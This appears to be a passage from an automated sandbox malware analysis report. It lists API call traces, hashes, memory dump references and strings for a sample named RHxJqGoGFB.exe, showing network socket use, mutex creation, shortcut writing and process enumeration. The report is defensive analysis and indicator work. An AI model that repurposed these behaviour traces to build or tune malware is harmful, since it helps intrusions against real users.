                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1023114332-0
                                                                                                            • Opcode ID: 3fc18c61d069feba7bd357372c947e1cfb1635f93d6d489af58f03dec38013e1
                                                                                                            • Instruction ID: f8f3acc7f71e0cda5711eafe8e43085b99678eaf4f23a1bcc123fb681509d2c8
                                                                                                            • Opcode Fuzzy Hash: 3fc18c61d069feba7bd357372c947e1cfb1635f93d6d489af58f03dec38013e1
                                                                                                            • Instruction Fuzzy Hash: D7B1F87590122DEFDB64DF64DC88BA9B7B5FB48304F1086D9E609A6250D774AE80CF50
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0090151A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00901542
                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00901563
                                                                                                            • lstrlen.KERNEL32(008D21A4), ref: 0090156E
                                                                                                            • lstrlen.KERNEL32(008D21A4), ref: 009015A2
                                                                                                            • lstrlen.KERNEL32(008F2654,?), ref: 0090160C
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0090164E
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00901672
                                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0090168D
                                                                                                            • SetEndOfFile.KERNEL32(?), ref: 0090169A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3635920088-0
                                                                                                            • Opcode ID: 32a3c5315246f4511d3ecc980f51ff6ac4b5a65da3d357bfe493499c32fac3ae
                                                                                                            • Instruction ID: 72087a4b421d4a12d9802a7e2c1a39a62d79a6d87155196c7825597218a74ec4
                                                                                                            • Opcode Fuzzy Hash: 32a3c5315246f4511d3ecc980f51ff6ac4b5a65da3d357bfe493499c32fac3ae
                                                                                                            • Instruction Fuzzy Hash: 4361EA75A00218FFDB14DBA4DD4ABEE7779BF48701F108685F709A6280D774AA80CF91
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 008F7C83
                                                                                                            • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 008F7CD8
                                                                                                            • connect.WS2_32(000000FF,00000002,00000010), ref: 008F7CEB
                                                                                                            • WSAGetLastError.WS2_32 ref: 008F7D05
                                                                                                            • Sleep.KERNEL32(00000032), ref: 008F7D1F
                                                                                                            • select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 008F7E79
                                                                                                            • ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 008F7EE6
                                                                                                            • closesocket.WS2_32(000000FF), ref: 008F7EFB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                            • String ID: 3'$@$@
                                                                                                            • API String ID: 3016611618-2553492011
                                                                                                            • Opcode ID: 98ff3908514921bf8be9195f7445ad941bf03a79a5729bef96c5e9b69ec0afd8
                                                                                                            • Instruction ID: 13455e5818e2819acb806ff95f892a8d8e2af4231aa81fefc63f0557f94eba1f
                                                                                                            • Opcode Fuzzy Hash: 98ff3908514921bf8be9195f7445ad941bf03a79a5729bef96c5e9b69ec0afd8
                                                                                                            • Instruction Fuzzy Hash: 3F71C77494822C9BEB24DB64D888BF9B775FF64304F2086D9D68AA6244DBB45EC08F50
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RHxJqGoGFB.exe,000001FE), ref: 004038EB
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0040390A
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 00403918
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 00403945
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0040394C
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0040395B
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00403963
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                            • String ID: Ap1mutx7$C:\Users\user\Desktop\RHxJqGoGFB.exe$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 1721171764-3812599134
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 4c7eabe6ed2e27b058bd06a9f100e91a826886d495d6e6cdf21b24436c5c7e96
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 4B11DE71244289ABEF10DEA08D49FDA37ACAB44B46F440425BA09FE1E0DAB59744876F
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 00900EF4
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00900F21
                                                                                                            • lstrcat.KERNEL32(?,.lnk), ref: 00900F43
                                                                                                            • lstrcat.KERNEL32(00000000), ref: 00900F70
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,000000FF,?,00000104), ref: 00900F8C
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 00900FA8
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00900FC8
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00900FFB
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0090103B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00901048
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 2963584520-24824748
                                                                                                            • Opcode ID: cc4b7f6bc754f6aa70e9c81a7d6520cf2b1935f0160e0e9c78a4a192383dedd0
                                                                                                            • Instruction ID: 344408b44c56536b0e9b57217f9b43080eba9e884c2f9f100cd6d2fa1f9b6042
                                                                                                            • Opcode Fuzzy Hash: cc4b7f6bc754f6aa70e9c81a7d6520cf2b1935f0160e0e9c78a4a192383dedd0
                                                                                                            • Instruction Fuzzy Hash: 814183B6900218ABDB21DB64DC49BEA77B9FF48301F0486E9F309E61D0DB745B898F50
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,0097EED8,000001FE), ref: 0097D935
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0097D954
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0097D962
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0097D98F
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0097D996
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0097D9A5
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0097D9AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 1721171764-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: fd8dafce17baf11444bd646670ff5ee0c8158fc99f9a2a37c0f1bf5be81445f5
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 6111DB72245289ABEF50DEA08D4DFE937ACAF84B05F444415FA0DFE0E0DAB19600876F
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000020,00000000), ref: 00900D32
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 00900D4B
• GlobalAlloc.KERNEL32(00000040,-00000F68), ref: 00900D6D
• ReadFile.KERNEL32(000000FF,00000000,00000098,00000000,00000000), ref: 00900D88
• CreateFileW.KERNEL32(-0000008E,80000000,00000001,00000000,00000003,00000020,00000000), ref: 00900DCC
• GetFileSize.KERNEL32(000000FF,00000000), ref: 00900DE1
• GlobalAlloc.KERNEL32(00000040,00010170), ref: 00900DFF
• ReadFile.KERNEL32(000000FF,00000000,00011170,00000000,00000000), ref: 00900E1A
• GlobalFree.KERNEL32(00000000), ref: 00900E46
• CloseHandle.KERNEL32(000000FF), ref: 00900E50
• GlobalFree.KERNEL32(00000000), ref: 00900E5A
• CloseHandle.KERNEL32(000000FF), ref: 00900E64
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$Global$AllocCloseCreateFreeHandleReadSize
• String ID:
• API String ID: 675253578-0
• Opcode ID: 49e65b505a7beade570ef8ce28e0d98a37af2ef901ed38d0f71fa629c1ee9700
• Instruction ID: c4715fbebc771d81d562d05b0d1d28b8228139b61f9989b3146b710c1c2a1cf4
• Opcode Fuzzy Hash: 49e65b505a7beade570ef8ce28e0d98a37af2ef901ed38d0f71fa629c1ee9700
• Instruction Fuzzy Hash: 8041E7B5E40209FBEB10DBE4DD89BAEBB79BF48701F108649F615B72C0D7B85A408B54
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008F9C94
• Process32First.KERNEL32(00000000,00000128), ref: 008F9CDD
• CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 008F9CF1
• Sleep.KERNEL32(00000400), ref: 008F9D67
• Sleep.KERNEL32(00000400), ref: 008F9DB2
• Process32Next.KERNEL32(00000000,00000128), ref: 008F9DC6
• CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 008F9DDA
• Sleep.KERNEL32(00000400), ref: 008F9E25
• Sleep.KERNEL32(00000400), ref: 008F9E9D
• CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 008F9EB3
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 3272108884-0
• Opcode ID: 2ba953c1799bed389ef154eaec53eef0c74dcf22fd42ea5987ef53acfed69a94
• Instruction ID: 479810fbca685f694e11d4dacff8e3271bb6781aae3e712bcdda858fc92729c2
• Opcode Fuzzy Hash: 2ba953c1799bed389ef154eaec53eef0c74dcf22fd42ea5987ef53acfed69a94
• Instruction Fuzzy Hash: CB5156B1A0112C9BDF24EB24DC49BEAB375FF55300F1441D9E649A7240DBB9AE80CF91
APIs
  • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
• lstrcat.KERNEL32(?,008F2490), ref: 00902C53
• lstrcpy.KERNEL32(00000000,00000000), ref: 00902D24
• lstrcat.KERNEL32(00000000,008F3DFC), ref: 00902D86
• lstrcat.KERNEL32(00000000,008F3E00), ref: 00902D98
• lstrcat.KERNEL32(00000000,008F3E04), ref: 00902DC1
• lstrlen.KERNEL32(00000000,%s,00903658,?,?,?,?,?,?), ref: 00902DD7
  • Part of subcall function 00902A35: lstrlen.KERNEL32(00000000), ref: 00902A4E
  • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DE0), ref: 00902A7C
  • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DE4), ref: 00902AA2
  • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DE8), ref: 00902AB1
  • Part of subcall function 00902A35: lstrlen.KERNEL32(00000000), ref: 00902B0C
  • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DEC), ref: 00902B40
  • Part of subcall function 00902A35: lstrcat.KERNEL32(00000000,008F3DF0), ref: 00902B66
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
• String ID: %s
• API String ID: 3361872186-3043279178
• Opcode ID: 6297888f73b4bd4f4394c9897181510ff52f40e32bc9b4cf876367790272ba09
• Instruction ID: 415dd8f50df5b65c7b890d1d5d0cb62c78c93fd52ac53bc11145a0b3a3f15a0c
• Opcode Fuzzy Hash: 6297888f73b4bd4f4394c9897181510ff52f40e32bc9b4cf876367790272ba09
• Instruction Fuzzy Hash: 596193B6A01118AFDB14DF68DC4A7ED77B5FF8C300F1085AAE609D22D0DB349A958F91
APIs
• CreateFileA.KERNEL32(C:\Windows\npqqe.log,40000000,00000002,00000000,00000004,00000080,00000000,?), ref: 008F5507
• lstrcpy.KERNEL32(00000000,C:\Windows\npqqe.log), ref: 008F553A
• lstrlen.KERNEL32(00000000,00000000), ref: 008F554E
• WriteFile.KERNEL32(000000FF,008F6958,00000000,?,00000000), ref: 008F5599
• SetEndOfFile.KERNEL32(000000FF), ref: 008F55A6
• CloseHandle.KERNEL32(000000FF), ref: 008F55B3
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$CloseCreateHandleWritelstrcpylstrlen
• String ID: C:\Windows\npqqe.log
• API String ID: 3630773104-2406171112
• Opcode ID: 109bf235b15cd34f9775851260dc9299a9b32769ae4ebbb3418c684ecbf3444e
• Instruction ID: e29c11d973cfe8aadfd9854f4e67fcffb9492478c9f99b3b60c914c27d5d0345
• Opcode Fuzzy Hash: 109bf235b15cd34f9775851260dc9299a9b32769ae4ebbb3418c684ecbf3444e
• Instruction Fuzzy Hash: F7315EB5900218ABDF20DB64DC8DBDAB779BB58700F0046D9F359A7291DBB46A848F90
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,?,?), ref: 008F9BA2
• Module32First.KERNEL32(?,00000224), ref: 008F9BC5
• CharUpperA.USER32(?,00000008,?,?), ref: 008F9BDE
• Module32Next.KERNEL32(?,00000224), ref: 008F9C2E
• CloseHandle.KERNEL32(?,00000008,?,?), ref: 008F9C3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
• String ID: DWEBIO$DWEBLLIO
• API String ID: 3788218250-3981995823
• Opcode ID: d4dc74505e6bdb2525b3b741bf241269ac310abb86b9710f8b2a20f5f04aac50
• Instruction ID: fcc3ffb16312ab246049b8a08c2ebbf06a2526f7e77d4d9b01a20a38d3d09241
• Opcode Fuzzy Hash: d4dc74505e6bdb2525b3b741bf241269ac310abb86b9710f8b2a20f5f04aac50
• Instruction Fuzzy Hash: 8921217190121CABDF20EBB4DD59BEAB3B8FB48300F0045D5E648E2181DB759A848F51
APIs
• htons.WS2_32(?), ref: 008F785A
  • Part of subcall function 008F719B: socket.WS2_32(00000002,00000002,00000011), ref: 008F7203
  • Part of subcall function 008F719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 008F726D
  • Part of subcall function 008F719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 008F7345
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F78CA
• htons.WS2_32(?), ref: 008F78E2
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F7940
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F79DC
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F7A19
  • Part of subcall function 008F6330: RtlEnterCriticalSection.NTDLL(00909050), ref: 008F63CD
  • Part of subcall function 008F6330: RtlLeaveCriticalSection.NTDLL(00909050), ref: 008F6960
• GlobalFree.KERNEL32(00000000), ref: 008F7A23
• RtlExitUserThread.NTDLL(00000000), ref: 008F7A2B
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
• String ID:
• API String ID: 4130859867-0
• Opcode ID: 109baa28321bcaac94c075e8508ec6793b0c22590d218294f7d9719b20ff4939
• Instruction ID: 92029c2db5432cddf465b50bb2d071cb9f2e042ccfa2fe128723d0a49d9c1268
• Opcode Fuzzy Hash: 109baa28321bcaac94c075e8508ec6793b0c22590d218294f7d9719b20ff4939
• Instruction Fuzzy Hash: 5A915975E04208BBEB04DBA4CC95FFEB7B5FF48700F148699E615AB281E7B59A40CB50
APIs
  • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
• lstrcpy.KERNEL32(00000000,00000000), ref: 00902D24
• lstrcat.KERNEL32(00000000,008F3DFC), ref: 00902D86
• lstrcat.KERNEL32(00000000,008F3E00), ref: 00902D98
• lstrcat.KERNEL32(00000000,008F3E04), ref: 00902DC1
• lstrlen.KERNEL32(00000000,%s,00903658,?,?,?,?,?,?), ref: 00902DD7
• wsprintfA.USER32 ref: 00902DE5
• lstrcat.KERNEL32(?,00000000), ref: 00902DF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
• String ID: %s
• API String ID: 3923932729-3043279178
• Opcode ID: a4b28fe99423cbeccafe78879de280020ccc21ca3737130950d3734675268491
• Instruction ID: c10d1d1cb45f1fb9e22938bb15816f7079584ddd1fbcfff53e4ed56bf10781f4
• Opcode Fuzzy Hash: a4b28fe99423cbeccafe78879de280020ccc21ca3737130950d3734675268491
• Instruction Fuzzy Hash: 7B3181B690112C9FDB24EB64DD8ABF97375FF98300F1085A5E719D21C0DA349E958FA0
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA6E6
                                                                                                            • lstrlen.KERNEL32(?,008F26B8,00000000), ref: 008FA6F8
                                                                                                            • wsprintfA.USER32 ref: 008FA704
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA6C5
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA70F
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA730
                                                                                                            • lstrlen.KERNEL32(?,008F26B0,00000000), ref: 008FA742
                                                                                                            • wsprintfA.USER32 ref: 008FA74E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
                                                                                                            • String ID:
                                                                                                            • API String ID: 2702386088-0
                                                                                                            • Opcode ID: db3520f52dec0742960b1c119f3e405782d3218a15484d9fdabc8d470f099751
                                                                                                            • Instruction ID: a626093987d7aec31397aba09f2e3d07de101e232ddb718b66cb79966c56477d
                                                                                                            • Opcode Fuzzy Hash: db3520f52dec0742960b1c119f3e405782d3218a15484d9fdabc8d470f099751
                                                                                                            • Instruction Fuzzy Hash: 242175B6602118BBDF14ABB8DC4DEBA37A9FF49341F045626FB1DC3251DA35D90087A2
                                                                                                            APIs
                                                                                                            • GetTempPathA.KERNEL32(00000080,00000000,?), ref: 008FA78C
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA796
                                                                                                            • lstrcat.KERNEL32(00000000,008F3CC0), ref: 008FA7B2
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FA7CF
                                                                                                            • lstrlen.KERNEL32(00000000,008F2880,00000000), ref: 008FA7FD
                                                                                                            • wsprintfA.USER32 ref: 008FA809
                                                                                                            • lstrlen.KERNEL32(00000000,008F288C,00000000), ref: 008FA826
                                                                                                            • wsprintfA.USER32 ref: 008FA832
                                                                                                            Memory Dump Source
